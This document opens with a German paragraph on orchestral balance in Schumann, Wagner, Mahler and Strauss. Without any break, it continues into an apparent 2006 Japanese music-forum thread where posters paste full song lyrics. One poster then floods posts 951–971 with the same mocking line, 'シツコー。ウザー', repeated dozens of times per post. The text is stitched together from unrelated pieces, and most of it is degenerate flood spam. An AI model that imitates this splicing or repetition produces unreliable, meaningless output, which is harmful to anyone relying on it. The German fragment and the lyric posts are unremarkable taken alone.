Eine solche Brillanz ist in Schumanns Musik nur selten zu finden. Aber manche Fachleute wissen auch, das es sehr wenige Kompositionen gibt,
deren Instrumentation makellos ist. Mehr als zwei Jahrzehnte nach Wagners Tod, zum Beispiel, uberdeckte seine Orchesterbegleitung die Stimmen der Sanger noch so,
das sie unhorbar wurden. Ich weis, das Gustav Mahler seine Instrumentation zugunsten der
Durchsichtigkeit sehr andern muste. Und Strauss selbst hat mir mehrere Stellen gezeigt, an denen er auszugleichen genotigt war.

946 :NO MUSIC NO NAME:2006/09/18(月) 00:34:00 ID:gOG3JEhM
つかみかけた夢のかけらカワラナイモノ
追ってる僕らは憧れ大空に浮かべて
疲れ果てた時の中でもカワラナイモノ
探すコンパスねぇいつまでも持っていれるかな

小さな思い出 そっと開いたノート 古い過去の行動を綴ったノート
それは丁度引き出しの一番奥の方の今も大切な宝物

眠りに付く頃訪れる夢の構想少しずつ
形変えながらも俺は気づくと大人になり
How to make my dream come true 分かるはずなんて無いせいでブルー
四苦八苦繰り広げ涙出る夢見る心のみ残る
星屑のように散った夢のかけら今はもう消えているその輝きが
でもまだ皆胸奥底どこかずっと大切な宝物

幼き頃の夢物語 忘られじ記憶の糸辿り
末だ胸を焦がす残り火を消してしまわないように
見慣れた晴れ渡るこの空に仲間と共に思いを託し
移り変わる時代を超え永久に永久に…

運命なんて言って良いのかな?この出会いは同じもの持った者同士
夜通し語った 笑った はしゃいだ あの夜に見つけた一番星
そんな思いを新たに綴ったノート 次のページたどり着く為の方法と方向
今は帆を揚げて共同で走り出したとうとう 進む航路をGO!

共に幾つもの季節を通り越して 長い間ずっと同じ夢を追ってる
振り返ればすぐに投げてきたんだ そんな過去をちょっと改めて
今ただ風に身を任せて進む方向に思いを乗せるだけで
「決して諦めない」なんて言わないだけで分かってるから声よ届け!

幼き頃の夢物語 忘られじ記憶の糸辿り
未だ胸を焦がす残り火を消してしまわないように
見慣れた晴れ渡るこの空に仲間と共に思いを託し
移り変わる時代を超え永久に永久に…


947 :NO MUSIC NO NAME:2006/09/18(月) 00:35:36 ID:5mJVdMEJ
冬の風に舞う二つの影
澄んだ藍の真下で
今僕が君にできることを
ずっと考えている

君が抱える暗闇に どれだけの明かりを今灯せるのだろう?

ただ「愛が欲しい…」と凍えそうな君を
抱きしめる ぬくもりで 溶かせないなら
今 僕が優しい光となって…
君だけを照らしていたいよ…


例えば君が羽根を失くして
闇に泣いてるとして…
なら僕はこの身を切り裂いて
君の羽根となりたい

そうやって生きてく それだけが僕がきっと君にできる愛の証明(あかし)で

さあ 涙の海をもう怖がらないで
そのために 僕がいる そばにいるから…
そう いつも優しい光の中で…
これ以上泣かなくていいよ


ただ「愛が欲しい…」と凍えそうな君を
抱きしめる ぬくもりで 溶かせないなら
今 僕が優しい光となって…
君だけを照らしていたいよ…


948 :NO MUSIC NO NAME:2006/09/18(月) 00:38:20 ID:SRKbF58U
七色のまつげで お日様と歩けば
街中のにおいが やさしさに変わった

やっと 笑顔の魔法 気づいたの 今日は

My brand-new eden ひとさじで
It's my own eden ひとことで

ありがとうの言葉 くちびるに塗ったら
何か始まるような 予感が吹いてきた

ココロ 醒ます方法 知ってるの 風は

My brand-new eden ひとふでで
It's my own eden ひとことで

ささくれた心隠し 丸まって生きる時
暗闇は 大切な 光のあたたかさをくれた

涙拭きとったら そこにある 虹は

My brand-new eden ひとさじで
It' my own eden ひとふでで
My brand-new eden 出かけよう
It's my own eden, my butterfly life!



949 :NO MUSIC NO NAME:2006/09/18(月) 00:39:38 ID:GdriLcN1
瞳と瞳が合うたびに 考えてる
もし恋に落ちて しまったらと
手と手がふれあって 忘れてしまう
指輪に 誓った約束

扉の前で 深呼吸して
「ただいま」と 言うけれど

心のカケラ あなただけに
置いてゆくから 抱きしめていて
冷たい風が 耳もとかすめ
私を 責めるの どうかしてるって
だけど感じた 気持ちだけは
素直でいたい I love you...

会うたびに時間が 足りなくなる
不思議な 魔法にかかって


別れ間際で 泣いたら負けと
言い聞かせてたけど

心のカケラ わたしだけに
預けて欲しい 抱きしめるから
季節はずれに 咲く花のように
温め 愛して ふくらんでゆくの
だけど一つになれないまま
それでもずっと I love you...

心のカケラ あなただけに
捧げてそっと さよならするわ
冬の夜空に 流れる星に
あなたの幸せ 願っているから
だけど愛した 気持ちだけは
忘れたくない I love you...
forever....


950 :NO MUSIC NO NAME:2006/09/18(月) 00:40:45 ID:ochGm6uk
メンヘラターン〜(つ´∀`)つ950ゲッツ

951 :NO MUSIC NO NAME:2006/09/18(月) 00:50:05 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

952 :NO MUSIC NO NAME:2006/09/18(月) 00:50:38 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

953 :NO MUSIC NO NAME:2006/09/18(月) 00:51:30 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

954 :NO MUSIC NO NAME:2006/09/18(月) 00:52:17 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

955 :NO MUSIC NO NAME:2006/09/18(月) 00:52:58 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

956 :NO MUSIC NO NAME:2006/09/18(月) 00:53:28 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

957 :NO MUSIC NO NAME:2006/09/18(月) 00:54:00 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

958 :NO MUSIC NO NAME:2006/09/18(月) 00:54:32 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

959 :NO MUSIC NO NAME:2006/09/18(月) 00:55:13 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

960 :NO MUSIC NO NAME:2006/09/18(月) 00:55:48 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

961 :NO MUSIC NO NAME:2006/09/18(月) 00:56:20 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

962 :NO MUSIC NO NAME:2006/09/18(月) 00:57:02 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

963 :NO MUSIC NO NAME:2006/09/18(月) 00:57:34 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

964 :NO MUSIC NO NAME:2006/09/18(月) 00:58:20 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

965 :NO MUSIC NO NAME:2006/09/18(月) 00:58:53 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

966 :NO MUSIC NO NAME:2006/09/18(月) 00:59:27 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

967 :NO MUSIC NO NAME:2006/09/18(月) 00:59:59 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

968 :NO MUSIC NO NAME:2006/09/18(月) 01:00:52 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

969 :NO MUSIC NO NAME:2006/09/18(月) 01:01:38 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

970 :NO MUSIC NO NAME:2006/09/18(月) 01:02:17 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

971 :NO MUSIC NO NAME:2006/09/18(月) 01:02:48 ID:Qaxn1+K/
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

